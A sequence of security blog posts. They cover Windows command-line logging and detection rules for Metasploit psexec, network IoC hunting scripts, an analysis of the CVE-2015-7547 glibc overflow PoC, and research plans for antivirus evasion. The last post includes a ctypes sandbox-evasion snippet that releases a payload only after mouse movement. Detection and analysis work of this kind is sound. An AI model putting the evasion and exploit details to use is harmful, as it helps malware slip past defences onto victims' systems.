On the other hand, too little data means you might not have enough log entries to investigate and provide full evidence of what malicious techniques were attempted. For this reason, it is a constant battle to find the middle ground between having hard evidence and not overwhelming your SIEM. Another golden question to ask is: are we even logging the correct events?


One of the ways to get around this problem is configuring the correct Group Policies on the Domain Controllers. In this blog post I want to focus solely on command line logging, because it is a quick win and it shows an immense amount of detail about which processes and commands are executed. We start off by enabling the correct settings in Group Policy using the Group Policy Editor. The steps are detailed below:




  • Follow the path Policies → Administrative Templates → System → Audit Process Creation, and enable "Include command line in process creation events".


  • Follow the path Policies → Windows Settings → Security Settings → Advanced Audit Policy Configuration → Audit Policies → System Audit Policies → Detailed Tracking, and enable both Success and Failure configuration for "Audit Process Creation" and "Audit Process Termination" as shown below.


After configuring these settings, run the good old group policy update from a command prompt as administrator using the command gpupdate /force. At this point, you should be able to see all commands executed via the command prompt.


We can test this by running some test commands and verifying the logs, as shown below. We can see that running these commands generates event ID 4688 (a new process has been created), which shows what was typed in the command prompt.





Now, we can move forward and test this with the exploit/windows/smb/psexec module from Metasploit, as shown below.




After setting the correct parameters, we execute the exploit and observe the logs produced from this action.




Now this will generate a lot of events, and keeping up with the incoming logs using Windows Event Viewer will be almost impossible. The best way to analyse these events is to parse them through a SIEM solution for better log management. After everything is set up correctly, we can begin the hunt! Monitoring the recent activity on the target machine, we see some interesting events:


  • Event ID 7045 – A service was installed in the system

The details around this event show that the service named yReAMNiNjOyqeWQI was installed by the user root (which we know is the user used for this exploit). There are some interesting parameters defined here, such as -nop, -hidden and -noni.


Such parameters can be used for obfuscation purposes. However, it becomes harder to detect these obfuscation parameters with keyword matching when there are multiple valid argument aliases for them. For example, for the -NoProfile argument alone, argument substrings such as -NoP, -NoPr, -NoPro, -NoProf, -NoProfi and -NoProfil are all valid! This is where we chuck keyword-matching filters out of the window and look towards regular expressions for detection.
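
As a hedged illustration of that regex approach (a sketch to tune, not a drop-in SIEM rule – it will have false positives), something like the following catches the common "stealth" switches however far they are abbreviated:

import re

SUSPICIOUS_PS_ARGS = re.compile(r"""(?ix)
    \s-(
        nop(rofile)?[a-z]*                          |  # -NoP ... -NoProfile
        noni(nteractive)?[a-z]*                     |  # -NonI ... -NonInteractive
        w(indowstyle)?\s+hidden                     |  # -W Hidden / -WindowStyle Hidden
        e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}     # -Enc <base64 blob>
    )""")

cmd = 'powershell.exe -nop -w hidden -noni -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA'
print(bool(SUSPICIOUS_PS_ARGS.search(cmd)))  # True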


Focusing more on the name of the service being installed, yReAMNiNjOyqeWQI looks like gibberish, which is exactly what it is. Looking at the source code of the psexec module in the Metasploit framework, we see that the display name is essentially 16 characters of random text! We just found another possible filter that could help us detect these types of exploits.
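
Building on that, a quick and dirty heuristic for 7045 events – again a hunting lead rather than a production rule, since legitimate 16-letter service names exist – is to flag services whose name is exactly 16 letters with high character entropy:

import math
import re
from collections import Counter

SIXTEEN_ALPHA = re.compile(r"^[A-Za-z]{16}$")

def entropy(s):
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_like_psexec_service(name):
    # 16 letters with no repeating structure => probably machine generated
    return bool(SIXTEEN_ALPHA.match(name)) and entropy(name) > 3.5

print(looks_like_psexec_service("yReAMNiNjOyqeWQI"))  # True
print(looks_like_psexec_service("wuauserv"))          # False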


Furthermore, we can also see a new process created (with event ID 4688) which logs the actual command being executed during this attack!


Do you remember the thing we did with the group policies earlier? It wasn't just to fill this blog post with random text and screenshots… nope… setting those group policies accordingly allows you to log what was executed in the command prompt, as shown above! This is very useful for monitoring what crazy things are being executed on your Windows network.


That’s all for now, I hope you found this helpful as well as interesting. In the next part of this blog post series I will reveal more ingesting detection techniques.

Short introduction to Network Forensics and Indicators of Compromise (IoC)

Posted by XoN on June 28th, 2016

Indicator of compromise (IOC) in computer forensics is an artifact observed on a network or in an operating system that with high confidence indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs or domain names of botnet command and control servers. After IOCs have been identified in a process of incident response and computer forensics, they can be used for early detection of future attack attempts using intrusion detection systems and antivirus software. – Wikipedia

Hello w0rld! In this post I plan to give a brief introduction to network forensics and how network monitoring can be used to identify successful attacks. Network monitoring is essential in order to identify reconnaissance activities such as port scans, but also for identifying successful attacks such as planted malware (e.g. ransomware) or spear-phishing. Generally, when doing network forensics the network footprint is of significant importance, since it allows us to replicate the timeline of events. That said, the network footprint can still be obscured/hidden by using cryptographic means such as point-to-point encryption. Even if you can't see the actual traffic because it is encrypted, you can still see the bandwidth load, which might itself be an IoC.

In incident response the first step is realising that an attack has actually taken place – if the attack is never noticed then of course there is no 'incident response' (doh!). There is a list of things the analyst should go over in order to try to identify whether an attack was successful. The list is not definitive and there are far more things that need to be checked than those discussed here.
Whether an attack is targeted or non-targeted, if it is utilising the Internet connection in any way it will leave network footprints behind. In targeted attacks we see things like spear-phishing and USB planting, which quite often target susceptible individuals with a lack of security awareness. Non-targeted attacks might include attack vectors such as malware, ransomware, malicious JavaScript, flash exploits, etc. This split is not absolute, since flash exploits and malicious JavaScript can also be used in a targeted fashion.
Depending on the network footprint each attack vector leaves, the Indicators of Compromise (IoC) we can look for include:

  • IP addresses
  • domain names
  • DNS resolve requests/response
  • downloadable malicious content (javascripts, flash, PDF files with embedded scripts, DOCX with Macros enabled)

There are also indicators coming out of behavioural analysis. For example, malware which contacts a Command & Control server will 'beacon' at (usually) regular intervals. This 'beaconing' behaviour can be identified by monitoring spikes of specific traffic or the bandwidth utilisation of a host. It can also be spotted by monitoring out-of-hours behaviour, since outside working hours a host should only be sending certain legitimate types of data, or none at all.
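
A toy example of spotting that kind of regularity – a sketch which assumes you have already reduced a capture to (timestamp, source, destination) records:

from collections import defaultdict
from statistics import mean, pstdev

def find_beacons(flows, min_events=10, max_jitter=0.1):
    # flows: iterable of (timestamp, src_ip, dst_ip) tuples
    times = defaultdict(list)
    for ts, src, dst in flows:
        times[(src, dst)].append(ts)

    suspects = []
    for pair, stamps in times.items():
        stamps.sort()
        deltas = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(deltas) < min_events:
            continue
        avg = mean(deltas)
        # near-constant interval => low relative standard deviation
        if avg > 0 and pstdev(deltas) / avg < max_jitter:
            suspects.append((pair, avg))
    return suspects
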
Ransomware will encrypt all accessible filesystems/mounted drives and will ask (guess what!?) for money! Most likely it will be downloaded somehow, or will be dropped by exploit kits or other malware. Sometimes it is delivered through email attachments (if the mail administrator has no clue!). As a stand-alone 'version', ransomware comes in portable executable (PE) format, although variants of CryptoLocker even employ PowerShell. In order to detect them we need a way to extract the files from the network dump. There are a couple of tools that do this, such as foremost, but it is also possible to do it 'manually' through Wireshark by exporting the objects. This assumes that the file transfer happened over an unencrypted channel and not under SSL.
Malware might serve many different purposes, such as stealing data, utilising bandwidth for DDoS, or acting as a 'dropper' through which ransomware is pushed. One of the more concerning is turning a compromised host into a zombie computer. Fast flux malware has numerous IPs associated with a single FQDN, whereas domain flux malware has multiple FQDNs per single IP. The latter is not ideal for malware authors, since that IP will be easily identified and its traffic dropped (a bit more about 'sinkholes' in the next paragraph!).
Assuming that we are after fast flux malware that uses a C&C, there are ways to locate the malware by looking for beaconing. Quite often these malware make use of DGAs (Domain Generation Algorithms), which basically hide the C&C IP behind a series of different domain names. Malware that uses a DGA is actively avoiding 'sinkholing', whereby ISPs identify the malicious C&C IP and 'blackhole' its traffic, shunning the infected system's communication with it.
An infected host will attempt to resolve (through DNS) a series of domain names produced by the DGA. This behaviour will lead to lots of 'non-existent domain' (NX) responses from the name server back to the infected machine. Monitoring the number of NX responses might help us identify infected systems; monitoring the DNS queries themselves should also help.
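
A rough sketch of that NX-response counting, using scapy (assumed installed) to walk a capture – rcode 3 marks NXDOMAIN, and the hosts at the top of the list deserve a closer look:

from collections import Counter
from scapy.all import rdpcap, DNS, IP

def count_nxdomain(pcap_path):
    counts = Counter()
    for pkt in rdpcap(pcap_path):
        if pkt.haslayer(DNS) and pkt.haslayer(IP):
            dns = pkt[DNS]
            # qr=1 marks a response; rcode 3 is NXDOMAIN
            if dns.qr == 1 and dns.rcode == 3:
                counts[pkt[IP].dst] += 1   # the response goes back to the client
    return counts.most_common(10)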

In a later post I will publish a small script that I am using to look for IoC.

[Figure: the script's main menu]

Script under development 😉

 

CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability

Posted by jstester007 on March 7th, 2016

Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (it hasn't got a cool name like GHOST, unfortunately…). It appears to be a highly critical vulnerability and affects a large number of systems. It allows remote code execution via a stack-based overflow in the client-side DNS resolver. In this post we would like to present our analysis.

Google POC overview


Google POC Network Exploitation Timeline

[Figure: network exploitation timeline diagram]

Google POC Exploit Code Analysis

First response

 

[Figure: code snippet]

 

[Figure: packet capture snippet]

The dw() function uses the "struct" module from the Python standard library. According to the documentation, it performs conversion between Python values and C structs represented as Python strings. In this case, it takes a Python integer and packs it into little-endian short binary data. This is a valid response sent by the "malicious" DNS server when it receives any initial queries. This response packet is intentionally constructed to be large (with 2500 bytes of null), which forces the client to retry over TCP and allocate an additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatenated.
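
As a concrete illustration of the packing described (assuming the little-endian interpretation above – this is not the PoC source itself):

import struct

def dw(value):
    # pack an integer into a two-byte little-endian (unsigned short) field
    return struct.pack("<H", value)

print(dw(2500))   # b'\xc4\t'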

 

Second Response

[Figure: code snippet]

 

[Figure: packet capture snippet]

This is the second response sent by the malicious DNS server. It is a malformed packet sending a large number of "fake records" (184 Answer RRs) back to the client. According to Google, this forces __libc_res_nsend to retry the query.

Third response

[Figure: code snippet]

 

[Figure: packet capture snippet]

 

This is the third response sent by the "malicious" DNS server. It is another malformed packet, and it carries the payload. A JUMPSEC researcher modified the Google POC code to identify the number of bytes needed to cause a segmentation fault (possibly overwriting the RET address) in the buffer. It was found that the RET address is overwritten at the 2079th byte. With the addition of a return-to-libc technique, an attacker can bypass OS protections such as the NX bit or ASLR and perform remote code execution.

 

Google POC debugging and crash analysis

JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT, which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated on in gaih_getanswer. The return address has been overwritten with 0x4443424144434241 ("ABCDABCD"). The state of the registers also shows the overflowed bytes.

[Figure: SEGFAULT from the vulnerable client – RET address overwritten with "ABCDABCD"]

[Figure: gdb backtrace]

[Figure: registers]

JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used…

[Figure: Iceweasel crashing]

Conclusion

The best way to mitigate this issue is to enforce proper patch management. Make sure to update all your systems with the latest version of glibc. If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered, then the following Wireshark filter could be useful: dns.length > 2048 (to see malformed packets). A UDP DNS response typically has a maximum of 512 bytes, and larger DNS replies are truncated. Even if the client does not accept a single large response, smaller responses can be combined into a large one which can also trigger the vulnerability. A possible approach is therefore to monitor the size of the entire conversation, as a specific number of bytes in total is required to trigger the relevant responses from a vulnerable client, and all of them require more than 2048 bytes.

The above vulnerability can be fixed by patching. If you are running RedHat or CentOS a simple

yum -y update glibc

will update glibc and resolve the issue (remember to restart affected services right after the update!).

Reference links

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547

http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html

https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html

https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

 

Research and Development

Posted by XoN on January 28th, 2016

Hello w0rld. In this post we would like to let you know our areas of research and the research projects we are currently working on. For 2016 we are planning to develop tools that will be used in our tests. Our areas of interest can be highlighted as:

  • AntiVirus Detection and Evasion techniques (sandbox detection, etc)
  • Packers, anti-debugging, anti-disassembly and binary obfuscation
  • Network packet capture analysis scripts looking for IoC

 

  • FUD Malware (maybe Veil Improvisation)

The initial idea is to find a way to create several different templates on top of Veil. Additionally, we can implement several add-ons for virtual machine detection or sandbox environment detection. These can either be logic-based, such as checking for human interaction, or use technical means like red pills. Even 2-3 assembly instructions can be used to identify a sandbox environment.
Veil exports a .py file which is quite random: it randomises variable names and, since it uses encryption, it also randomises the key that will be used. It then encrypts the payload and stores it in a .stub area of the binary. This area is unpacked at execution time and a routine is responsible for decrypting and launching the payload. This doesn't offer any sandbox detection or VM detection; it is heavily focused against AVs, and specifically on defeating signature-based detection systems.
The idea of having different binaries while still using the same payload (meterpreter) is necessary for pentesters and for quickly generating payloads to be used in social engineering tasks.
Technically, the most important property is a large keyspace: the larger the key space, the more 'impossible' it is to hit the same binary twice. Veil provides that, but there are still issues with the actual binary. My thought is to either break apart the exported binary and place it inside a new one, OR just add several lines of code to the python script that will be used for compilation (through py2exe or pwninstaller). Another possibility is to mess around with pwninstaller and add things there. Another idea is to add randomisation to the techniques used for defeating/escaping sandbox environments.
Things that are looking promising:

  1. Mess with the actual PE header: things like .STAB areas – add more stab areas, add junk data to stab areas, or even add other encrypted data that might look interesting (the hyperion paper also has a super cool idea…)
  2. Change the file size of the exported binary dynamically. This will happen assuming the above happens. (This can also be randomised with NOP padding.)
  3. Change values that will not necessarily mess the execution (maybe the versioning of the PE? or the Entry point of the binary?)
  4. Write a small scale packer for performance and maybe add also VM detection there
  5. Employ sandbox detection and VM detection through several means (this also adds to the 2nd step)
  6. Randomized routines for sandbox detection (if mouse_right_click = %random_value then decrypt else break/sleep) – a rough sketch of this kind of check follows below
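
To make that last point concrete, here is a crude, purely illustrative example of a human-interaction check in Python with ctypes (Windows only); a real implementation would randomise the check itself, as noted above:

import ctypes
import time

user32 = ctypes.windll.user32

class POINT(ctypes.Structure):
    _fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]

def cursor_moved(window_seconds=30):
    # a sandbox with no human operator usually never moves the mouse
    before, after = POINT(), POINT()
    user32.GetCursorPos(ctypes.byref(before))
    time.sleep(window_seconds)
    user32.GetCursorPos(ctypes.byref(after))
    return (before.x, before.y) != (after.x, after.y)

if cursor_moved():
    pass              # decrypt and launch the payload
else:
    time.sleep(10**6) # sleep instead of detonating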

 

Implementation techniques will include ctypes for sandbox detection and adding loops or other useless things such as calculations. Using ndisasm or pyelf to mess with the binary is also suggested. Red pills can be used in several different techniques.

 

  • Packer

Another idea that JUMPSEC Labs has is to develop our own packer. This will have several routines for:

  1. Static analysis obfuscation: Encryption
  2. Dynamic analysis obfuscation: Add noise in program flow/Add randomness to data/runtime
  3. Anti-debugging
  4. Sandbox escape: Detect human interactions

 

  • Network Analysis Scripts

We are developing several scripts for analysing pcap files. The purpose of these scripts is to parse packet captures and identify whether there are IoCs (Indicators of Compromise), by performing statistical analysis of protocol usage and searching for potential protocol misuse (HTTP requests/responses that aren't according to the RFC).